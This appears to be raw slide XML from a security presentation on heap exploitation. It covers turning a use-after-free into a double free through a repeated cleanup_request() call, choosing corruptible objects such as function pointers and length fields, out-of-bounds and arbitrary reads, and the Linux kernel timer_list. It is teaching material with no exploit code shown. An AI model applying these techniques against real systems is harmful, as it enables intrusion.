            <a:ext cx="62310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11B857C-72B7-574C-BBB1-EE21B599C519}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="628650" y="2542122"/>
            <a:ext cx="284251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361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he use after free turns into a double free :) ">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ABD06587-F36A-7747-BF07-4F5013EE2DF1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Double Free!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Content Placeholder 4" descr="Freeing the headers. Creates a double free opportunity ">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{660A0C7F-A720-0940-816F-0778694D3148}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1299530" y="2241443"/>
            <a:ext cx="6083300" cy="2781300"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="6" name="Straight Connector 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E2429CBE-A82E-E04A-8C42-AD81524EB81B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1978055" y="4291023"/>
            <a:ext cx="458254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3C47E29-5FE1-7346-8BA5-34437CBF188F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1978054" y="3937395"/>
            <a:ext cx="531939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3B598D1-D1BC-9C4B-9D58-356A72FC691D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1978053" y="3620405"/>
            <a:ext cx="531939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8C0DB52-AA88-AC48-B9A7-CD783700DBBA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1299530" y="1687609"/>
            <a:ext cx="6761395" cy="563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Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>cleanup_request</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>() </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Avenir Book" panose="02000503020000020003" pitchFamily="2" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>frees the headers AGAIN</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6602009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2685-F1D9-0444-8588-302074296051}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>UAF or DF? </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{66A72C51-403E-014F-B4F6-2918E38C9B33}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use After Free</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0FBEFD2B-A355-D44C-8BCF-114A651B2306}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Less steps for exploit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Less heap feng shui</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Limited usage – until </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>cleanup_request</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Set object (headers)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D5F6F722-9E91-F54B-94B2-7C251BF7B485}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Double Free</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AFB45489-F99B-0A44-8F94-FCBFFD9DB515}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4629156" y="1878809"/>
            <a:ext cx="4639131" cy="2763441"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>More steps – trying to get UAF</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Requires precision in allocation amounts &amp; sizes to NOT crash</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Usable </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0"/>
              <a:t>later</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> in the program</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Free arbitrary objects</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="156598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DD0C-CA33-A347-8FF6-4157A2F6AC93}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>All Together</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Content Placeholder 4" descr="HTTP request in hex">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C3259C1B-3EA5-3C45-AB4D-5666E5809598}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="32131" y="3027285"/>
            <a:ext cx="9130995" cy="1180731"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6" descr="Request">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1F887B84-216C-CE43-857D-2A61107661C8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5202315" y="273846"/>
            <a:ext cx="3791072" cy="2435605"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="9" name="Straight Connector 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A169C5D-7C8A-1F42-9D52-411449B74DAA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5726097" y="3311370"/>
            <a:ext cx="86113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22888C-6E9F-164B-BA08-C39AC8EE779F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480873" y="3872142"/>
            <a:ext cx="7176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FF9E0BF-A929-4C4F-B667-76DF9C7DC033}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1290220" y="3872142"/>
            <a:ext cx="7176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53D742-008C-3E4E-A932-AC24CC9A83C7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1231034" y="2796465"/>
            <a:ext cx="0" cy="102980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5DF9B2-17AD-D747-8AC6-682094EBD476}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="27370" y="2427133"/>
            <a:ext cx="3243311" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Separation of Headers and Body</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="18" name="Straight Connector 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{55C8B444-0BD3-4E41-AD3D-0BCA348129CC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8328919" y="1199964"/>
            <a:ext cx="66730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955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D3A4-2CE3-4143-8588-D6540B736758}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If All Techniques Fail?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="9" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EFB90F55-0966-EF9E-DC1D-D5854D0E6095}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph idx="1"/>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23631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0BE1-4972-BF46-BC1E-208DA5A8A6AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Living Off the Land</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{19828F35-DD1F-3E4A-B8A7-0657A85E1BBC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="628650" y="1236541"/>
            <a:ext cx="4603997" cy="3263504"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" u="sng" dirty="0"/>
              <a:t>Application defined objects</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="Hunter-Gatherer Societies">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7DAAF100-F850-8147-991E-81C7D068E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498" y="1677812"/>
            <a:ext cx="5243003" cy="2953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092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8BB7C-C230-BB4B-B1E9-88759707B5E7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What Makes a Good Object?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CE3470DC-4BD1-6C4B-BA91-C1FB360FD550}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Important Data: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Function Pointers (any pointers really) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Length values</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Sizing – even size extendable</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="Server response struct. How to attack this? ">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E15DA4A0-0296-F548-8A15-742A052C7213}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="628650" y="3129748"/>
            <a:ext cx="4178300" cy="1866900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="8" name="Straight Arrow Connector 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{90DEEF53-86D4-5A4E-BE9A-59F43977A585}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3489931" y="2867487"/>
            <a:ext cx="3017401" cy="77235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12C21E7-461D-694C-AF2E-9BC494D75972}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3003138" y="3639844"/>
            <a:ext cx="3903689" cy="35658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129CE6-B4A5-DD45-ACFC-91342CD58BCF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6464608" y="2560866"/>
            <a:ext cx="1411550" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>OOB read</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="TextBox 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D2D62C67-31F3-9D48-A00D-1071AF8B79C7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6839000" y="3350099"/>
            <a:ext cx="1971785" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Arbitrary read</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="954885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95F3-759D-804D-9AD4-46A4016D0E37}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>timer_lst</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> in Linux Networking</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Content Placeholder 4" descr="Linux kernel 'timer_list' in the networking stack.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{40BBE2D6-3007-1942-B56B-880C978F3AD5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="118570" y="1867096"/>
            <a:ext cx="5788240" cy="3142756"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AA3FE639-9DCE-3440-8F44-B563520B17A6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="535820" y="2103104"/>
            <a:ext cx="5370990" cy="10585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F69BF84-39F6-4F49-96F1-64E3E1E19822}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3668162" y="1743559"/>
            <a:ext cx="3011607" cy="51776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785B4B3-6677-1B48-8A05-2A051B998B98}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6588595" y="1420393"/>
            <a:ext cx="2121452" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Linked List pointer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="10" name="Straight Arrow Connector 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
